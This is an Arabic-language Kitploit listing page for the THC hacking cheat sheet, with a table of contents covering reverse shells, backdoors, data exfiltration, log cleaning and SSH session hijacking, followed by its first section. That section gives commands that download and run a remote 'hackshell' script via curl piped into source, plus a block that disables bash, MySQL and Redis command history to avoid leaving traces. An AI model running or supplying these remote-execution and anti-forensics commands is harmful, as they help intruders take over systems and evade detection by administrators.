Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
thc-tips-tricks-hacks-cheat-sheet — نصائح وحيل متنوعة | Kitploit
أدوات/GitHubGitHub/hackerschoice/thc-tips-tricks-hacks-cheat-sheet
الاستخبارات مفتوحة المصدر (OSINT)آليات الاستمراريةالحركة الجانبيةتسريب البياناتجمع المعلوماتما بعد الاستغلالاختبار الاختراقالفريق الأحمرموارد منسقة

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
تطوير الحمولات
GitHubhackerschoice/thc-tips-tricks-hacks-cheat-sheet

thc-tips-tricks-hacks-cheat-sheet

نصائح وحيل متنوعة

عرض المستودع
3.9k47149منذ 3 أشهرتمت المراجعة من قبل Kitploit

النصائح والحيل والاختراقات المفضلة لدى THC (ورقة الغش)

https://thc.org/tips

مجموعة من حيلنا المفضلة. العديد من هذه الحيل ليست منا. نحن فقط نجمعها.

نعرض الحيل 'كما هي' دون أي شرح لسبب عملها. تحتاج إلى معرفة لينكس لفهم كيف ولماذا تعمل.

لديك حيل؟ انضم إلينا https://thc.org/ops

  1. Bash
    1. إعداد صدفة اختراق
    2. إخفاء أوامرك
    3. إخفاء خيارات سطر الأوامر
    4. إخفاء اتصال شبكة
    5. إخفاء عملية كمستخدم
    6. إخفاء عملية كجذر
    7. إخفاء السكربتات
    8. الإخفاء من cat
    9. التنفيذ بالتوازي مع ملفات سجل منفصلة
  2. SSH
    1. SSH غير مرئي تقريبًا
    2. أصداف متعددة عبر اتصال SSH/TCP واحد
    3. نفق SSH
    4. نفق SSH socks5
    5. SSH إلى مضيف NATed
    6. محور SSH عبر ProxyJump
    7. SSHD كمستخدم
  3. الشبكة
    1. اكتشاف المضيفين
    2. Tcpdump
    3. النفق وإعادة التوجيه
      1. منافذ TCP العكسية الخام
      2. إعادة التوجيه العكسي عبر HTTPS
      3. ارتداد الحركة مع iptables
      4. Ghost IP / انتحال IP
      5. متنوع
    4. استخدام أي أداة عبر وكيل Socks
    5. العثور على عنوان IP العام الخاص بك
    6. التحقق من قابلية الوصول من جميع أنحاء العالم
    7. فحص/مسح المنافذ المفتوحة
    8. كسر تجزئات كلمات المرور
    9. القوة الغاشمة لكلمات المرور / المفاتيح
  4. رفع/تنزيل/تهريب البيانات
    1. ترميز/فك ترميز الملفات
    2. نقل الملفات باستخدام القص واللصق
    3. نقل الملفات باستخدام tmux
    4. نقل الملفات باستخدام screen
    5. نقل الملفات باستخدام gs-netcat وsftp
    6. نقل الملفات باستخدام HTTP
    7. تنزيل الملفات بدون curl
    8. نقل الملفات باستخدام rsync
    9. نقل الملفات إلى مواقع إغراق عامة
    10. نقل الملفات باستخدام WebDAV
    11. نقل الملفات إلى تيليغرام
  5. الصدفة العكسية / الصدفة البكماء
    1. الأصداف العكسية
      1. مع gs-netcat (مشفّر)
      2. مع Bash
      3. مع cURL (مشفّر)
      4. مع cURL (نص صريح)
      5. مع OpenSSL (مشفّر)
      6. مع remote.moe (مشفّر)
      7. بدون /dev/tcp
      8. مع Python
      9. مع Perl
      10. مع PHP
    2. ترقية الصدفة البكماء
      1. ترقية صدفة عكسية إلى صدفة pty
      2. ترقية صدفة عكسية إلى صدفة تفاعلية بالكامل
      3. صدفة عكسية مع socat (تفاعلية بالكامل)
  6. الأبواب الخلفية
    1. gs-netcat
    2. sshx.io
    3. أصغر باب خلفي SSHD
    4. الوصول عن بُعد إلى شبكة كاملة
    5. أصغر باب خلفي PHP
    6. أصغر باب خلفي بنفق DNS عكسي
    7. باب خلفي محلي بصلاحيات الجذر
    8. زرع ذاتي الاستخراج
  7. استطلاع المضيف
  8. حيل الصدفة
    1. تمزيق الملفات (حذف آمن)
    2. استعادة تاريخ ملف
    3. تنظيف ملف السجل
    4. إخفاء الملفات عن مستخدم بدون صلاحيات الجذر
    5. جعل ملف غير قابل للتغيير
    6. تغيير المستخدم بدون sudo/su
    7. تعتيم وتشفير الحمولة
    8. نشر باب خلفي دون لمس نظام الملفات
  9. التشفير
    1. توليد كلمة مرور عشوائية سريعة
    2. أنظمة ملفات مشفرة قابلة للنقل في لينكس
      1. cryptsetup
      2. EncFS
    3. تشفير ملف
  10. التنصت على الجلسات واختطافها
    1. التنصت على جلسة صدفة مستخدم
    2. التنصت على جميع جلسات الصدفة باستخدام dtrace
    3. التنصت على جميع جلسات الصدفة باستخدام eBPF
    4. التنصت على جلسة SSH أو SSHD لمستخدم باستخدام strace
    5. التنصت على جلسة SSH الصادرة لمستخدم باستخدام سكربت غلاف
    6. التنصت على جلسة SSH الصادرة لمستخدم باستخدام SSH-IT
    7. اختطاف / الاستيلاء على جلسة SSH قيد التشغيل
  11. VPN والأصداف
    1. خوادم جذر مؤقتة
    2. مزودو VPN/VPS
  12. جمع المعلومات الاستخبارية OSINT
  13. متنوعات
    1. أدوات المهنة
    2. أوامر لينكس الرائعة
    3. ورقة غش tmux
    4. أوامر مفيدة
  14. كيف تصبح مخترقًا
  15. مواقع أخرى

1. Bash / الصدفة

1.i. إعداد صدفة اختراق (bash):

اجعل BASH أقل ضجيجًا. يعطّل ~/.bash_history وأشياء أخرى كثيرة.```sh source <(curl -SsfL https://thc.org/hs)

URL بديل:```sh
 source <(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)

وإذا لم يكن هناك curl/wget، استخدم surl وcurl مثبتًا (مؤقتًا) باستخدام bin curl.```sh source <(surl https://raw.githubusercontent.com/hackerschoice/hackshell/main/hackshell.sh)

Afterwards type bin curl to (temporarily) install curl (in memory).

تقوم HackShell بأكثر من ذلك بكثير، لكن الأهم من ذلك:```sh
unset HISTFILE
[ -n "$BASH" ] && export HISTFILE="/dev/null"
export BASH_HISTORY="/dev/null"
export LANG=en_US.UTF-8
locale -a 2>/dev/null|grep -Fqim1 en_US.UTF || export LANG=en_US
export LESSHISTFILE=-
export REDISCLI_HISTFILE=/dev/null
export MYSQL_HISTFILE=/dev/null
TMPDIR="/tmp"
[ -d "/var/tmp" ] && TMPDIR="/var/tmp"
[ -d "/dev/shm" ] && TMPDIR="/dev/shm"
export TMPDIR
export PATH=".:${PATH}"
if [[ "$SHELL" == *"zsh" ]]; then
    PS1='%F{red}%n%f@%F{cyan}%m %F{magenta}%~ %(?.%F{green}.%F{red})%#%f '
else
    PS1='\[\033[36m\]\u\[\033[m\]@\[\033[32m\]\h:\[\033[33;1m\]\w\[\033[m\]\$ '
fi
alias wget='wget --no-hsts'
alias vi="vi -i NONE"
alias vim="vim -i NONE"
alias screen="screen -ln"

TERM=xterm reset -I
stty cols 400 # paste this on its own before pasting the next line:
resize &>/dev/null || { stty -echo;printf "\e[18t"; read -t5 -rdt R;IFS=';' read -r -a a <<< "${R:-8;25;80}";[ "${a[1]}" -ge "${a[2]}" ] && { R="${a[1]}";a[1]="${a[2]}";a[2]="${R}";};stty sane rows "${a[1]}" cols "${a[2]}";}
# stty sane rows 60 cols 160

نستخدم anew كثيرًا، وهذا حل سريع:```shell xanew() { awk 'hit[$0]==0 {hit[$0]=1; print $0}'; } which anew &>/dev/null || alias anew=xanew

نصيحة إضافية:
أي أمر يبدأ بـ" " (مسافة) لن [يُسجَّل في سجل الأوامر](https://unix.stackexchange.com/questions/115917/why-is-bash-not-storing-commands-that-start-with-spaces) أيضًا.```
$  id

1.ii. إخفاء أمرك / Daemonzie أمرك

تنزيل الأداة